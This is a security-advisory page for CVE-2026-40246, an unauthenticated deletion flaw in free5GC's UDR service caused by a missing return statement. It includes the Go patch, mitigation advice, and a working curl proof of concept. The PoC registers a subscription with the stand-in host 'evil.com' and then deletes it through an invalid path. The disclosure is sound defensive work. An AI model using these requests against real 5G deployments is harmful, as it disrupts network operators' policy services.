Skip to main content

CVE-2026-40246

HIGH
Improper Authorization (CWE-285)
2026-04-14 https://github.com/free5gc/udr GHSA-g9cw-qwhf-24jp
8.7
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

6
Analysis Updated
Apr 21, 2026 - 14:14 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Apr 16, 2026 - 22:22 vuln.today
cvss_changed
CVSS changed
Apr 16, 2026 - 22:22 NVD
8.7 (HIGH)
Analysis Generated
Apr 14, 2026 - 22:36 vuln.today
Analysis Generated
Apr 14, 2026 - 20:31 vuln.today
CVE Published
Apr 14, 2026 - 20:00 nvd
HIGH 8.7

DescriptionGitHub Advisory

Summary

An improper path validation vulnerability in the UDR service allows any unauthenticated attacker with access to the 5G Service Based Interface (SBI) to delete Traffic Influence Subscriptions by supplying an arbitrary value in place of the expected subs-to-notify path segment.

Details

The endpoint DELETE /nudr-dr/v2/application-data/influenceData/{influenceId}/{subscriptionId} is intended to only operate on Traffic Influence Subscription resources when influenceId is exactly subs-to-notify.

In the free5GC UDR implementation, the path validation is present but ineffective because the handler does not return after sending the HTTP 404 response. The request handling flow is:

  1. The function HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdDelete in ./free5gc_4-2-1/free5gc/NFs/udr/internal/sbi/api_datarepository.go checks whether influenceId != "subs-to-notify".
  2. If the value is different, it calls c.String(http.StatusNotFound, "404 page not found"), but it does not return afterwards.
  3. Execution continues and the handler still calls s.Processor().ApplicationDataInfluenceDataSubsToNotifySubscriptionIdDeleteProcedure(c, subscriptionId).
  4. The processor deletes the subscription identified by subscriptionId even though the path is invalid and the request should have been rejected.

As a result, an attacker can send a request to an invalid path, receive an apparent 404 page not found response, and still successfully delete the target subscription.

The missing return after sending the 404 response in api_datarepository.go is the root cause of this vulnerability.

PoC

No authentication is required. Only a valid subscriptionId is needed.

bash
# Create a subscription to obtain a valid subscriptionId
curl -v -X POST "http://<udr-host>/nudr-dr/v2/application-data/influenceData/subs-to-notify" \
  -H "Content-Type: application/json" \
  -d '{
    "notificationUri":"http://evil.com/notify",
    "dnns":["internet"],
    "supis":["imsi-222777483957498"]
  }'

Example response:

HTTP/1.1 201 Created

Then delete it through an invalid path:

bash
curl -v -X DELETE "http://<udr-host>/nudr-dr/v2/application-data/influenceData/WRONGID/87615e16"

Response:

HTTP/1.1 404 Not Found
404 page not found

Now verify that the subscription was actually deleted:

bash
curl -v "http://<udr-host>/nudr-dr/v2/application-data/influenceData/subs-to-notify/87615e16"

Response:

json
{"title":"User not found","status":404,"cause":"USER_NOT_FOUND"}

Impact

This is an unauthenticated unauthorized delete vulnerability. Any attacker with network access to the SBI can delete Traffic Influence Subscriptions by knowing or guessing a valid subscriptionId.

This can disrupt policy-related notification workflows and remove active subscription state from the UDR. In addition, the attack is harder to detect because the API returns a misleading 404 Not Found response even when the deletion is actually performed.

Impacted deployments: any free5GC instance where the SBI is reachable by untrusted parties (e.g., misconfigured network segmentation, rogue NF, or compromised internal host).

Patch

The vulnerability has been confirmed patched by adding the missing return statement in NFs/udr/internal/sbi/api_datarepository.go, function HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdDelete:

go
if influenceId != "subs-to-notify" {
    c.String(http.StatusNotFound, "404 page not found")
    return
}

With the patch applied, requests using an invalid influenceId now correctly return HTTP 404 and do not delete the targeted subscription.

AnalysisAI

Unauthenticated deletion of Traffic Influence Subscriptions in free5GC UDR service (GitHub package free5gc/udr) allows remote attackers to disrupt 5G policy notification workflows by exploiting a missing return statement after path validation. The vulnerability affects any free5GC deployment where the 5G Service Based Interface (SBI) is network-accessible to untrusted parties. Public exploit code exists demonstrating deletion via crafted DELETE requests to invalid API paths. EPSS score of 0.06% (19th percentile) suggests low widespread exploitation probability, though the attack requires only network access and no authentication (AV:N/PR:N), making it trivially exploitable in misconfigured deployments.

Technical ContextAI

The vulnerability resides in free5GC's Unified Data Repository (UDR) service, a core 5G network function implementing 3GPP Service-Based Architecture interfaces. The UDR manages application data including Traffic Influence Subscriptions used for policy control and quality-of-service steering. The affected endpoint DELETE /nudr-dr/v2/application-data/influenceData/{influenceId}/{subscriptionId} implements RESTful path-based access control, expecting influenceId to equal 'subs-to-notify' for valid subscription deletion. The root cause (CWE-285: Improper Authorization) stems from a control flow error in the Go handler function HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdDelete within api_datarepository.go. The code validates the path parameter but sends an HTTP 404 response without returning, allowing execution to continue to the deletion procedure. This represents a classic fail-open authorization bypass where security checks are present but ineffective due to missing control flow termination. The vulnerability is specific to the Go implementation in github.com/free5gc/udr and affects 5G Service-Based Interface deployments where network segmentation relies on application-layer access controls rather than network isolation.

RemediationAI

Apply the upstream patch by updating to the patched version of free5GC that includes the fix for GHSA-g9cw-qwhf-24jp (https://github.com/free5gc/free5gc/security/advisories/GHSA-g9cw-qwhf-24jp). The patch adds a return statement after the HTTP 404 response in NFs/udr/internal/sbi/api_datarepository.go function HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdDelete, ensuring invalid path requests terminate without executing deletion logic. If immediate patching is not feasible, implement these compensating controls with noted trade-offs: (1) Restrict network access to the UDR SBI interface (typically TCP port 8000 or custom port) using firewall rules or network segmentation to allow only authenticated 5G network functions (AMF, SMF, PCF) - this is the most effective mitigation but requires accurate network topology mapping and may break legitimate inter-NF communication if misconfigured; (2) Deploy an API gateway or reverse proxy in front of the UDR service with strict path validation rules that reject requests where influenceId does not equal 'subs-to-notify' before forwarding to the backend - adds latency (typically 1-5ms) and becomes a single point of failure; (3) Enable verbose API request logging on the UDR service and monitor for DELETE requests returning 404 status codes, investigating any subscription deletions that coincide with 404 responses - detective control only, does not prevent exploitation. Long-term, architect 5G core deployments with zero-trust principles where SBI interfaces use mutual TLS authentication between network functions rather than relying on network isolation alone.

Share

CVE-2026-40246 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy